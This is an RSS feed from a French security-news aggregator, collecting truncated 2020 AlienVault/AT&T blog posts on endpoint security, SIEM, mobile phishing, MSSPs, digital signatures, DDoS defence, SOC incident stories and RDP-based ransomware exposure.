This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-04T10:27:51+00:00 www.secnews.physaphae.fr AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 70 percent of the most successful breaches originate at the endpoint. And, in today’s work from home (WFH) landscape, more employees are connecting to internal networks from endpoints outside the office than ever before. The endpoint represents one of the greatest threats to an organization’s vulnerability and can be an easy path and entry point for cybercriminals. Through an endpoint, attackers can use your company’s assets to execute code or exploit vulnerabilities. Because endpoints represent every device connected to your network, an attack can become unmanageable quickly if endpoints are not properly managed and secured. , Why is endpoint protection difficult to achieve? With critical threats arriving consistently, prioritizing the most harmful ones is a constant struggle. Attacks today are smarter and more challenging to detect. Ponemon’]]> 2020-08-12T15:19:00+00:00 https://feeds.feedblitz.com/~/633303254/0/alienvault-blogs~What-is-endpoint-protection-Endpoint-security-explained www.secnews.physaphae.fr/article.php?IdArticle=1856545 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-08-12T11:00:00+00:00 https://feeds.feedblitz.com/~/633269478/0/alienvault-blogs~Being-onsite-for-an-assessment-is-better-but-a-lot-of-it-is-possible-remotely www.secnews.physaphae.fr/article.php?IdArticle=1855783 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-08-10T22:28:00+00:00 https://feeds.feedblitz.com/~/633193288/0/alienvault-blogs~Cyber-threat-intelligence-explained www.secnews.physaphae.fr/article.php?IdArticle=1854378 False Malware,Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-08-10T17:40:00+00:00 https://feeds.feedblitz.com/~/633122188/0/alienvault-blogs~Cybersecurity-risk-management-explained www.secnews.physaphae.fr/article.php?IdArticle=1852410 False Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Security Information and Event Management (SIEM) solutions have been the foundation of enterprises’ security operations and threat detection & response.  Even though USM Anywhere has many key SIEM features, it is much more than a SIEM. Why?  To perform threat detection, SIEMs and purpose-built threat consoles collect data from security devices. These include network firewalls, endpoint devices, & vulnerability managers to directly from the cloud.   However, all too often, they collect disparate data sources without an organizing principle.  Instead, SIEMs build bigger (and exponentially growing) data lakes of unnormalized log data without a quick and easy way to truly understand the data.   Of course, this may work for the world’s largest security operations teams which have the resources to find the proverbial needles in the haystack — or to deploy complex analytics engines to help find those needles.  They are now even offering orchestration solutions to automate the ever-increasing workload of alert triage and to help manual investigation of potential incidents. However, this does not solve the underlying problem. In the end, they are building more and bigger haystacks and then delivering increasingly complex and expensive technology to help security professionals shift through those stacks.  But the underlying challenge of finding and responding threats quickly has not been solved; in other words, security teams can’t easily and quickly find the proverbial needles in the haystack.  The legacy and big data SIEMs require that an enterprise customer has an informed security team that has the experience, expertise, and resources to sift through massive volumes of data and find the needles.  This is unlikely to succeed.  First, even the most well-funded security teams simply do not have the resources to keep up with the threats, and the legacy and big data SIEMs require this. Second, these solutions help enterprises get the data in one place and then the security teams can broadly query the data to find the threats.  They do not actually help security professionals shift through the data intelligently and quickly.  As the SIEMs add even more assets to be monitored, they have to dynamically query against the asset data.  Try doing this at scale against endpoint, network, asset, and other data — all from disparate sources.  They simply cannot do this in real-time.   What is AT&T Cybersecurity’s approach and why is different from others? A solution is only as good as its smarts USM Anywhere starts with being a threat intelligence delivery vehicle.  What does that mean?  First, our solution centralizes all visibility in a single place like other solutions, but there is a key difference.  It is designed for looking at the right data.  By correlating data from virtually anywhere, we can use common methods for consistency of data and to pull out key meta data.  For example, USM Anywhere can get data from diverse network devices, such as firewalls, web gateways and cloud services, or from endpoints’ network connections. That’s the first step.  Then, by focusing on the threat actors and their techniques, tactics and procedures (TTPs), the data to be collected is really focused on the threats.  Building on the network data example, USM Anywhere can look for the network traffic indicative of connections to a command-and-control server even if the traffic is originating from different sources.  But it’s not looking at all the traffic.  USM Anywhere focus]]> 2020-08-10T11:00:00+00:00 https://feeds.feedblitz.com/~/633084536/0/alienvault-blogs~Don%e2%80%99t-call-it-a-SIEM-%e2%80%93-How-USM-Anywhere-does-threat-detection-and-response-differently www.secnews.physaphae.fr/article.php?IdArticle=1851624 False Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-08-06T11:00:00+00:00 https://feeds.feedblitz.com/~/632682652/0/alienvault-blogs~How-to-secure-Syslog-with-USM-Anywhere www.secnews.physaphae.fr/article.php?IdArticle=1844751 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Mobile internet traffic surpassed desktop traffic in 2014 and the gap continues to widen. Attackers have noticed this trend and are getting a higher return on investment by phishing mobile devices. Lookout data shows that 1 in 50 enterprise users are phished on mobile devices daily and that mobile phishing rates have doubled for users of Office 365 and G Suite. This is a massive problem on a small screen. With the smaller screen and apps optimized for mobile, it is more challenging for consumers and employees to identify a phishing attack in the same way they would on a laptop or desktop computer. Attackers know this and purposely use specific mobile phishing techniques such as URL padding and tiny URLs to further obfuscate the attack. Lookout data suggests that enterprise users are three times more likely to fall for a phishing link when presented on the small screens of mobile devices rather than when presented on the screens of desktop OS, like Windows or macOS. Financial services has embraced BYOD The other major shift in security is the adoption of personal devices for work. Historically, financial organizations have invested heavily in security solutions such as secure email gateways, inbox scanning, and end-user training to protect against Business Email Compromise (BEC) scams. They have also traditionally required that employees use heavily restricted corporate mobile devices for work. However, as financial firms increasingly adopt Bring Your Own Device (BYOD) mobile strategies, these techniques remain too narrowly focused on email and do not protect against phishing attacks that enter through modern messaging, such as SMS, Slack, and Microsoft Instant Messaging. Lookout exclusive data shows phishing encounter rates exceeding 21% in 1Q2020. Malicious URLs include ad fraud, botnets, command and control centers, links to malware, malware call-home, malware distribution points, phishing/fraud, spam URLs,]]> 2020-08-05T11:00:00+00:00 https://feeds.feedblitz.com/~/632586046/0/alienvault-blogs~Combat-mobile-phishing-attacks-targeting-Financial-Services-with-AI www.secnews.physaphae.fr/article.php?IdArticle=1842906 False Spam,Malware,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Dark Reading) The team took a deeper look and discovered the account was indeed compromised. The analyst team engaged the customer, who was able to take the appropriate actions and remediate the situation before anything more severe could occur. Investigation Initial Alarm Review Indicators of Compromise (IOCs) The initial alarm surfaced as the result of two login events originating from two different countries within nine minutes of each other. This irregular activity indicated that a user’s account was likely compromised.    Foreign logins are nothing new. We see dozens of alerts from multiple customers every day.  Most of them are false positives caused by legitimate Virtual Private Network (VPN) or other tunnel services, and multi-factor authentication (MFA) traffic from valid users traveling overseas, for example. Expanded investigation Alarm Detail With the rise of work from home due to COVID-19, alarms for dual geographical logins have been on the rise as well.  With so much volume coming through for review, it’s imperative to self-police the natural human tendency to base our view of future outcomes on past outcomes.  Just because the last 200 were false positives does not mean the 201st alarm will be. Response Building the investigation One of the differences for this alarm that assisted in throwing off any predisposed notions was the domain used by the account.  It was not the standard customer email / account name domain.  A quick search of the company and I was able to see that the two companies were in the same industry, and it’s not uncommon for companies to allow vendors or industry partners to retain their domain for login IDs.  But still, it caught my attention. Customer interaction The obvious main consideration for these types of alarms are the geographies themselves.   But with a third party in the equation, even explicitly knowing the geographies did not provide much additional information.  Not knowing the full extent of the third party’s geographic business, I had no idea if the foreign country was a likely work location or not for their employees. Customer Response(s) Given all the unknowns, this had to be sent as an Investigation to the client to verify activity.  Upon review, it was determined that this was indeed a compromised account and the customer remediated the situation.  As we have seen from the history of breaches, third pa]]> 2020-08-04T11:00:00+00:00 https://feeds.feedblitz.com/~/632452610/0/alienvault-blogs~Stories-from-the-SOC-Compromised-account-detected www.secnews.physaphae.fr/article.php?IdArticle=1841453 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Vulnerability management – MSSPs help organizations identify, prioritize, and remediate known vulnerabilities that can be used by cybercriminals to gain access to applications, systems, and data. Vulnerability Management services can range from simply providing vulnerability assessments of networks, systems, and applications (with the customer organization doing the remediation), to full-blown vulnerability management where discovered vulnerabilities are also remediated through automated patching and system reconfiguration. Intrusion management – Networks need to be continually monitored for possible cyberattack. MSSPs leverage intrusion detection and intrusion prevention systems to look for and block anomalous network traffic that may potentially be malicious in nature. Security technology management – MSSPs handle the daily management of advanced threat defense technologies, unified threat management, security gateways, firewalls, VPNs and more. Threat hunting – This is a service that proactively identifies and eradicates threats in your environment using computer forensics, cyber threat intelligence and malware analysis. Security compliance monitoring and management – Organizations required to prove their state of security is compliance with government and industry regulations rely on MSSPs to assess, track and document the state of an organization’s adherence to compliance mandates such as the Payment Card Industry Data Security Standard (PCI-DSS), the European Union’s General Data Protection Regulation (GDPR), and the Health Insurance Portability and Accountability Act (HIPAA). Why would organizations use an MSSP? The outsourcing of such a critical aspect of business operations requires that doing so provides an organization with significant benefits. Due to the material impact data breaches and ransomware attacks have had on organizations, with post-attack costs reaching into the tens of millions, the idea of putting the safety of the network into a provider’s hands can be daunting. Even with such critical levels of importance, organizations choose to leverage MSSPs to manage their security a number of reasons: 1) Expertise – MSSPs maintain a staff that are experts on many aspects of cybersecurity. Organizations concerned with cyberattacks and the fortification of their environment’s security often find they are lacking internal expertise. Outsourcing to an MSSP extends the internal IT team t]]> 2020-08-03T18:11:00+00:00 https://feeds.feedblitz.com/~/632405656/0/alienvault-blogs~Managed-security-services-explained-what-is-an-MSSP www.secnews.physaphae.fr/article.php?IdArticle=1840534 False Ransomware,Malware,Vulnerability,Threat,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC as far back as 1999, but in the intervening years came to be somewhat taken for granted by security engineers. Not any longer: the massive move to home working precipitated by the Covid-19 pandemic have forced many to take a fresh look at the security value of digital signatures, why they matter, and their relationship to encryption. We thought we'd do the same. In this article, we'll give you a refresher course on how digital signatures work, why they are important for security, and what the future holds. How do digital signatures work? Digital signatures, at the most fundamental level, are mathematical algorithms used to validate the authenticity and integrity of an electronic message. This "message" could be an email, a credit card transaction, or a digital document. Digital signatures create a virtual "fingerprint" that is completely unique to a person (or other entity), and can therefore be used not just to protect the contents of messages, but also to ensure that they were written by who they claim to have been. At a deeper level, digital signatures work by applying a hash function to a message. In most cases, a user's private key will be used to create a "hash," which is a fixed-length string of numbers and letters. The way in which hash functions work means that this string is totally unique to the message being hashed. In addition, hash functions are also one-way functions — a computed hash cannot be reversed to find other files that may generate the same hash value. The most popular hashing algorithms in use today are Secure Hash Algorithm-1 (SHA-1), the Secure Hashing Algorithm-2 family (SHA-2 and SHA-256), and Message Digest 5 (MD5). The importance of digital signatures The value of digital signatures has been long recognized, but recent events have meant that they are being deployed at an unprecedented rate. This is because digital signatures afford the ability for users to securely communicate when working remotely – which more than half of US workers did even before the pandemic – without the need for a permanent, sustained encrypted connection. More specifically, digital signatures allow three factors about a message to be verified: Authentication. Because, in most implementations, digital signatures are created using the sender's private encryption key, it is possible to verify the identity of the message source.   Data Integrity. Because hash functions produce a digital signature by looking at the entirety of a particular message, if any part of the message changes, so does the hash function. This means that if a message is intercepted in transit and changed, the digital certificate verification performed by the recipient fails. This means that the recipient has an easy way to check if data security has been breached.]]> 2020-08-03T11:00:00+00:00 https://feeds.feedblitz.com/~/632326920/0/alienvault-blogs~Digital-signatures-security-explained www.secnews.physaphae.fr/article.php?IdArticle=1840535 True Tool None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC as far back as 1999, but in the intervening years came to be somewhat taken for granted by security engineers. Not any longer: the massive move to home working precipitated by the Covid-19 pandemic have forced many to take a fresh look at the value of digital signatures, why they matter, and their relationship to encryption. We thought we'd do the same. In this article, we'll give you a refresher course on how digital signatures work, why they are important, and what the future holds. How do digital signatures work? Digital signatures, at the most fundamental level, are mathematical algorithms used to validate the authenticity and integrity of an electronic message. This "message" could be an email, a credit card transaction, or a digital document. Digital signatures create a virtual "fingerprint" that is completely unique to a person (or other entity), and can therefore be used not just to protect the contents of messages, but also to ensure that they were written by who they claim to have been. At a deeper level, digital signatures work by applying a hash function to a message. In most cases, a user's private key will be used to create a "hash," which is a fixed-length string of numbers and letters. The way in which hash functions work means that this string is totally unique to the message being hashed. In addition, hash functions are also one-way functions — a computed hash cannot be reversed to find other files that may generate the same hash value. The most popular hashing algorithms in use today are Secure Hash Algorithm-1 (SHA-1), the Secure Hashing Algorithm-2 family (SHA-2 and SHA-256), and Message Digest 5 (MD5). The importance of digital signatures The value of digital signatures has been long recognized, but recent events have meant that they are being deployed at an unprecedented rate. This is because digital signatures afford the ability for users to securely communicate when working remotely – which more than half of US workers did even before the pandemic – without the need for a permanent, sustained encrypted connection. More specifically, digital signatures allow three factors about a message to be verified: Authentication. Because, in most implementations, digital signatures are created using the sender's private encryption key, it is possible to verify the identity of the message source.   Data Integrity. Because hash functions produce a digital signature by looking at the entirety of a particular message, if any part of the message changes, so does the hash function. This means that if a message is intercepted in transit and changed, the digital certificate verification performed by the recipient fails. This means that the recipient has an easy way to check if data security has been breached.   ]]> 2020-08-03T11:00:00+00:00 https://feeds.feedblitz.com/~/632326920/0/alienvault-blogs~Digital-signatures-A-powerful-and-underused-cybersecurity-ally www.secnews.physaphae.fr/article.php?IdArticle=1839063 False Tool None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Endpoint security is a process that can be carried out through both policy and software and encompasses securing various endpoints (mobile devices, laptops, desktops, servers, IoT devices) on a network. Key functions of endpoint security include antivirus and firewall checking, ensuring patches are up to date, preventing dangerous processes from running, and keeping confidential data from being cached. Network access control (NAC) – Network access is controlled and managed through a combination of authentication, endpoint security measures, and enforcement of network security policy. Single sign-on (SSO) – Enables users to authenticate to and access various applications and resources with one set of login credentials. Privileged access management (PAM) – Privileged access management can take on different meanings; but generally speaking, PAM is a set of tools for securing, managing, and monitoring access to an enterprise’s data from privileged accounts. Why is secure remote access important? With the work from home shift in the workforce, endpoints are accessing corporate networks from multiple locations. Today, employees’ home networks are often the originating point for network connections, multiplying the risk on both home and corporate networks. Antiquated security measures must be replaced with solutions in syn]]> 2020-07-31T15:03:00+00:00 https://feeds.feedblitz.com/~/632051116/0/alienvault-blogs~Secure-remote-access-explained www.secnews.physaphae.fr/article.php?IdArticle=1835309 False Malware None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Ed Amoroso. There’s something eerily familiar about the COVID-19 pandemic for us in the technology world. It’s not the striking similarity to the Hollywood “end-of-the-world” movies we have all seen. No, it’s more about the fear and uncertainty that accompanies an economic downturn—the feeling that “the party is over, and this time the economy may never recover.” Even if our own company is doing well, we see so many of our friends and customers struggling in travel, leisure, transportation, retail and other industries. Of course, we all should know that “what goes up must come down,” and vice-versa. But when you are up the proverbial waterway without the requisite navigation aid, it’s easy to feel glum. And not for nothing, by the way—companies are cutting salaries across the board. Unemployment runs as high as 15% in some parts of the country. And although the cybersecurity job market remains strong, things are changing fast, and there are never any promises for the future. The pessimistic economic outlook got us (Ed and Roger) talking about a previous, “this time it's different” economic collapse— the “dot-com” crash back in 2001. Back then, I (Roger) was working as a technology “fixer”—the guy you called in to help pull good companies out of bad circumstances. It was gratifying to bring them back to life, but reducing headcount was usually part of the equation and was never easy, particularly during the downturn. It was in that context that a friend invited me to speak at a software conference held at what was then the Cypress Hotel, in Cupertino. “No need to prepare anything,” he said, “just come as you are.” I accepted without thinking. As a member of the team that launched Java at Sun Microsystems, I had routinely presented at technical conferences. As it turned out, however, this was no technical conference–it was a job fair, offering career advice to out-of-work software engineers (some of whom I may have had a hand in putting out of work). “What am I going to say to them?” I asked my friend, “I’m a consultant—I don’t know anything about recruiting or job hunting!” “Yes, but you’re the busiest guy I know,” he responded, “Just share ideas on how to get back to work.” For thirty-five minutes, I sat silently on the stage. The professional panelists before me presented successively pessimistic views of the economic future. They had professional slides with grim figures and colorful charts featuring upside-down V’s. “Nasdaq down 77%. 415,000 jobs lost within a month. Billions in market capitalization gone. Millions of jobs outsourced to India, and never coming back. Few opportunities on the horizon.” It was really hard to watch. As time grew near to my turn to speak, I could think of just one thing: “I have to say something positive. I can’t bear to let this close on such a dismal note!” I was looking out at a room full of hundreds of super-smart engineers who had worked hard to get to where they were, only to have it all snatched away by the collapse of the stupid dot-com bubble, 9-11, and some accounting scandals. So much wasted talent. But that gave me an idea! “How many of you worked tirelessly to earn a degree in engineering, math or science?” I asked the audience. Hands shot up throughout the room. “And how many of you actually ended up with a six figure salary for shuttling data between a web form and a database?” Nearly all still had their hands in the air, as an uneasy chuckle swi]]> 2020-07-20T11:00:00+00:00 https://feeds.feedblitz.com/~/630955569/0/alienvault-blogs~In-hard-times-solve-big-problems-and-do-your-best-work www.secnews.physaphae.fr/article.php?IdArticle=1814583 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Image Source   In Part 1 and  Part 2 of this series, we covered the first two steps to better cybersecurity in touchless business solutions, which is to practice extra caution in cashless payment solutions, and to heighten cybersecurity and data protection protocols. We conclude this series by discussing the third step to improve cybersecurity for touchless systems, which is to automate wherever possible through innovative technologies. We will discuss automation being implemented in 2 industries severely affected by the pandemic, with recommended preventive measures against cyber-attacks that keep both business and clients secure. Automate wherever possible through innovative technologies The food industry is probably one of the most affected in the wake of the pandemic. Restaurants had to close almost immediately. From established food chains to small business operators, the need to quarantine nearly drove the market to a standstill.  But since the food business industry is an essential need industry, you cannot just shut it down. Food delivery and take-out became the only way for these businesses to continue serving their communities. Employers needed to implement strategies to preserve their teams to stay in business amid the pandemic. But what happens when these establishments open their doors to the public once more?  In the “new normal” we are all gearing to come to, restaurants can only operate at around 50% capacity. Technology integration is essential to preserve human touch. Here are some examples of how automation can be done in this industry: Examples of automation technology applications: ● Online sales and delivery Restaurants would now be expecting more revenue coming from online sales and delivery, as the population reels from the effects of the pandemic, going to a restaurant may be in the least of people’s priority. But eating is not. Food businesses need to adapt the offline experience they give to their consumers online without losing the uniqueness of the experience their brand can offer. Food distributors are also affected because it became harder to move their warehouse inventory. So, instead of merely relying on doing business with restaurants, hotels, and the like, they now had to go direct to consumers through online sales and delivery. Food warehouses and even food production services would also have to automate where possible, like inventory maintenance and logistics. Walk-up operations, together with online ordering systems, can also be set in place. ● Automated retail Even before the global pandemic, the retail industry has been driving towards automation and customer-centricity. Creating touchless supply chains and automating wherever feasible, is now possible through innovative technologies such as Artificial Intelligence (AI), Machine Learning (ML), and the Internet of Things (IoT). AI helps you get to know your consumers better, while ML helps you plan better b]]> 2020-07-16T11:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/3-steps-to-better-cybersecurity-in-touchless-business-solutions-part-3-of-3~Steps-to-better-cybersecurity-in-touchless-business-solutions-Part-of www.secnews.physaphae.fr/article.php?IdArticle=1807695 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-07-16T06:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/vulnerability-scanning-what-is-it-and-what-are-the-benefits~Vulnerability-scanning-explained www.secnews.physaphae.fr/article.php?IdArticle=1807189 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Our integrations go deeper than just data collection, alarming on dangerous events, and visualizations.  All these apps also contain either notification or response actions. Response actions are exactly what they sound like.  Say an alarm is triggered because someone on the network is communicating with a known malware command and control (C&C) entity.  The most obvious quick fix for this is blocking access to the C&C so the team can assess the threat posed by the device and take other actions as needed.  This is exactly the kind of action we do with many vendors.  Without leaving the USM Anywhere console or loggin]]> 2020-07-15T11:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/alienapps-roundup-box-cloudflare-palo-alto-networks-salesforce-servicenow-zscaler-checkpoint~AlienApps-Roundup-Box-Cloudflare-Palo-Alto-Networks-Salesforce-ServiceNow-Zscaler-Checkpoint www.secnews.physaphae.fr/article.php?IdArticle=1805474 False Malware,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020-07-15T07:01:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/security-as-a-service-explained~Security-as-a-Service-explained www.secnews.physaphae.fr/article.php?IdArticle=1805231 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC particularly susceptible to security hacks, but even large corporations are not immune. Consumers may assume big companies have the best security systems in place, but hackers are savvy and can find their way around these measures. One of the biggest data breaches in recent memory was to Marriott International from 2014 to 2018, where valuable information from over 500 million customers was stolen by hackers. The hackers were able to get into the Starwood hotel brand’s system and remain there after Marriott acquired the company, giving them access to an even greater array of data. Not only did this breach impact many customers’ private information, but it also impacted foreign politics. The attack could be traced back to Chinese hackers, which is influencing potentially one of the biggest trade deals in modern U.S. history. Data breaches go far beyond customers needing to get new credit cards. It can drastically impact consumer trust and even impact foreign affairs. In the long-term, the devastation caused by such hacks can be even worse than most people, businesses, and politicians realize. Quantifying the loss and damages that result from a data breach Destruction may seem like a strong word when dealing with security hacks. However, as you look closely, you may find that it’s an appropriate term. When you try to explain the kind of destruction caused by a data breach, where do you begin? The easiest would be in relation to how much the data breach costs a company. After all, a dollar amount placed on such a scandal would make it easy to quantify how bad one breach is to another. However, data breaches go beyond losing companies’ money in the short-term. They can also have long-term psychological impacts. Thanks to the internet, no one forgets anything anymore. Once people learn a company failed to take adequate security measures to protect their customers’ data, they won’t forget. There are many ways for companies to build cybersecurity policies. It may seem expensive right now, but the potential losses a business may suffer from a data breach make security measures seem like pennies in a bucket. That loss of trust will become even more pronounced if the data breach was the result of something that should have easily been avoided. For example, in the Marriott case, hackers were able to gain access to millions of people’s private information due to two employees’ login credentials becoming compromised. If just those two workers had taken better security measures, then the whole thing could have been avoided. That information, combined with rebranding efforts to gain back consumer trust, adds up. Data breaches can be prevented, and while security measures may seem unnecessary or expensive now, it pales in comparison to what a company has to deal with in the aftermath of a hack. Suddenly, it’s no longer millions ]]> 2020-07-14T11:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/the-damaging-impact-data-breaches-have-on-american-society-as-a-whole~The-damaging-impact-data-breaches-have-on-American-society-as-a-whole www.secnews.physaphae.fr/article.php?IdArticle=1803677 False Data Breach None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 8.4 million DDoS attack attempts each year DDoS costs U.S. organizations $10B each year Average downtime from DDoS is 30 minutes, but some attacks can last for days at a time Negative DDOS impact The disruption of DDoS attacks can threaten business resilience on many fronts: Customer experience: Customers cannot connect with company resources online via web site, mobile app, or email Revenue streams: Downtime on retail sites or apps prevents purchases from going through Employee productivity: Employees are unable to access email, VoIP, or online resources to get their work done Brand reputation: The inability to absorb or repel DDoS attacks can garner bad press and make the world think less of your business Key vulnerabilities for DDoS attacks The typical DDoS attack tends to prey upon weaknesses in the way systems are designed to communicate rather than outright vulnerabilities in software code. For example, most volumetric DDoS attacks send an influx of traffic from all over the world to a specific target with the goal of completely saturating bandwidth available on that system's network. In this case the exploited vulnerability is a lack of infrastructure resilience to absorb the flood of traffic. SYN flood attack In other instances, DDoS attackers seek out weaknesses in how protocols work or how they're configured in order to prompt system time outs and crashes. The classic example here is the SYN flood attack, which overwhelms servers with half-open TCP protocol connections. The attacker does this by initiating a whole bunch of connection requests without completing the TCP three-way handshake, thereby filling up system resources with half-open connections so there's no room to fully open legitimate TCP connections.  The vulnerability being exploited in this case is in the way the server has been configured to handle half-open connection requests. Cybercriminals can also take advantage of chinks in the communication armor at the application layer to carry out DDoS attacks. For example, with HTTP flood attacks, criminals take advantage of the inherent trust a web server may have in every request coming from a client browser. Without some means of detecting traffic is malicious, a web server exhausts itself by trying to fulfill concentrated and voluminous requests for database calls or random information that come from attackers' botnets. Exploring your DDoS defense options As with any other type of cybersecurity defense, DDoS defense requires a layered approach. A sound DD]]> 2020-07-14T07:33:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/ddos-attack-prevention-protection-explained~DDoS-attack-prevention-and-protection-explained www.secnews.physaphae.fr/article.php?IdArticle=1803328 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 60% of children are using the internet for over forty hours a week. Many of these children are taking cybersecurity for granted because they simply aren’t aware of many of the digital security risks that come with online use. This is why it is vitally important not only for parents to teach their children about basic measures on how to stay safe online, but also for schools to make cybersecurity an essential part of their curriculum going forward to ensure that the next generation is properly aware of how to keep online security risks to a minimum. One example is the Cyber Discover virtual cyber school program that teaches children games and lessons on how to fix web page security flaws, uncover trails that cybercriminals leave behind, and decrypt hacker codes. Students who grow up with strong foundations in these kinds of cybersecurity skills could later help fill the massive cybersecurity skills gap. In this article, we’ll take a look at the role of cybersecurity in education, what exactly this school is teaching the younger generation, and how it will impact the cybersecurity industry in the future. The role of education in cybersecurity Children may not use the internet to generate as much financial and personal data like adults do, but that doesn’t mean that their digital lives couldn’t harm them in some way. It also doesn’t mean that children never consist targets for hackers and cybercriminals. This is why all children need to have a basic understanding of how to keep their data private and secure online just like adults do. Utilizing and rotating strong passwords, logging in with anonymous usernames, storing data in the cloud, and encrypting your network when online is just a small handful of security hygiene measures that can go a long way to keeping hackers and cybercriminals at bay. This is even more important since online criminals have been taking full advantage of the COVID-19 pandemic. Just as teaching children about reading and mathematics from a very young age will benefit them immensely later in life, so will teaching them about basic cybersecurity measures. This is why schools and educational institutions absolutely have a role to play in teaching children about online privacy principles to follow and security technologies to help keep them safe. That being said, while teaching children basic cybersecurity principles is certainly a good thing, it also will only go so far because it won’t teach students the actual skills needed in avoiding security risks and keeping hackers at bay. Instead, instructors need to actually model good cybersecurity behavior and incorporate it into the classroom. Since compu]]> 2020-07-13T11:00:00+00:00 https://feeds.feedblitz.com/~/630196969/0/alienvault-blogs~Teaching-kids-skills-to-catch-hackers-and-fix-security-risks-at-Cyber-Discover www.secnews.physaphae.fr/article.php?IdArticle=1801818 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC AT&T Managed Threat Detection and Response customers. Executive Summary During the Investigation of a Suspicious Security Critical Event alarm, we discovered credentials had been dumped from the NTDS.dit, which is a database that stores Active Directory data, including password hashes for all users in the domain. By extracting these hashes, it’s possible for an attacker to use tools to gain access to user’s passwords, which allows them to act as any user on the domain, including the administrator. If an attacker gains access to an administrator account, the opportunities are endless. The team immediately dug deeper into the event and determined a username tied to the actions. In under an hour we had triaged this set of alarms, created the Investigation, and reached out to the customer in accordance with the Incident Response Plan (IRP) that was created in collaboration with the customer’s security team. Investigation Initial Alarm Review Indicators of Compromise (IOCs) The initial alarm surfaced as a result of multiple alarms with the method of Azure Security Center alert over a short period of time. Expanded investigation Alarm Detail We received 11 low severity alarms with a method of Azure Security Center Alert.  Ten of the alarms indicated Domain Name System (DNS) scanning and were all internal traffic.  More concerning was the eleventh alert which indicated (by event name) that credentials had been dumped from the NTDS.dit file.  The alarming source was a domain controller which added credence to the alarm and reduced the likelihood this was a false positive. Response Building the investigation With the action taken being undefined, I had to assume the credential dump completed successfully.  In a best-case scenario, it meant an encrypted file of hashed passwords was sent to an unknown destination.  At that point, I determined the Investigation would be escalated to a high severity. The next significant piece of information was contained in the event details which thankfully picked up a username involved in this activity. This customer had just recently moved to 24x7 monitoring with the MTDR SOC, so we did not have a long history to compare activity from this username or validate that it had an admin role.  An administrative role and action by the account would be the only valid business explanation for credential dumping activity.  Given the username did exist on the customer’s network and the alarm was preceded by ten other Azure alarms, I inferred that the company was active on their cloud infrastructure and decided to lower the Investigation severity to medium. Customer interaction Even though the alarm had originated as a low severity alarm, in under an hour we had triaged this set of alarms, created the Investigation, and made phone calls to the two point of contacts in accordance with the Incident Response Plan (IRP) requirements for a medium severity investigation.  The admins were very quick to respond and confirmed that this was valid admin activity.  The administrator was conducting password strength checks against all user p]]> 2020-07-09T11:00:00+00:00 https://feeds.feedblitz.com/~/629858773/0/alienvault-blogs~Stories-from-the-SOC-Credential-Dumping www.secnews.physaphae.fr/article.php?IdArticle=1798506 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC SamSam have continued to adopt a wider variety of skilled attacker tactics including directly probing and exploiting external perimeter services. The FBI recently highlighted this trend in a public service announcement last month entitled “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations” which highlighted perimeter attacks against remote desktop protocol (RDP) as one of the primary methods of infection. As someone who works in the vulnerability scanning, penetration testing sphere, I can say that attacker tactics on the perimeter have dramatically improved since the earlier part of the decade with the combination of improved RDP brute forcing libraries in wide distribution, better open source intelligence gathering methods, and leaked credential databases available to help arm these tools. A recent Shodan query shows over 3.5 million exposed RDP services as of the writing of this blog post and this number has actually trended upwards over the years so this is not a problem going away anytime soon.  The fact that the sorts of small to midsize organizations that tend to have issues with allowing direct perimeter access for remote desktop, also correlate strongly with the typical targets of ransomware campaign make the issue even more pressing. Some observations on what organizations can do: 1) While various methods of securing or enhancing the protections around RDP services exist, it's really best to ensure it's only directly accessible behind a VPN with strong security protections.  Sometimes companies fall into the methodology of thinking if remote-desktop is patched against vectors like BlueKeep or has things like Network Level Authentication enabled, it's an effective control but the most common wave of attacks are simply targeting weak or stolen credentials sets which these controls do little to mitigate.  Focus on removing the RDP attack surface entirely from the perimeter. 2) Don't fall into the trap of assuming that RDP is the only attack surface that matters (even thought it gets most of the hype).  We've already seen heavy usage of JBoss based exploits by ransomware attackers and that will surely expand as low-hanging fruit from the existing ransomware attack vectors become mined-out.  Security tools such as massscan can be retrofitted by attackers with new probes and payloads to rapidly scan for and target millions of potentially vulnerable systems. Any vulnerability which allows for code execution on externally 